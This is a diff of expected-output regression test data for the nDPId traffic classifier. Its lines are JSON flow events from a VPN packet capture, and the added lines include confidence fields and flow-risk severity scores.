+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00739{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00928{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
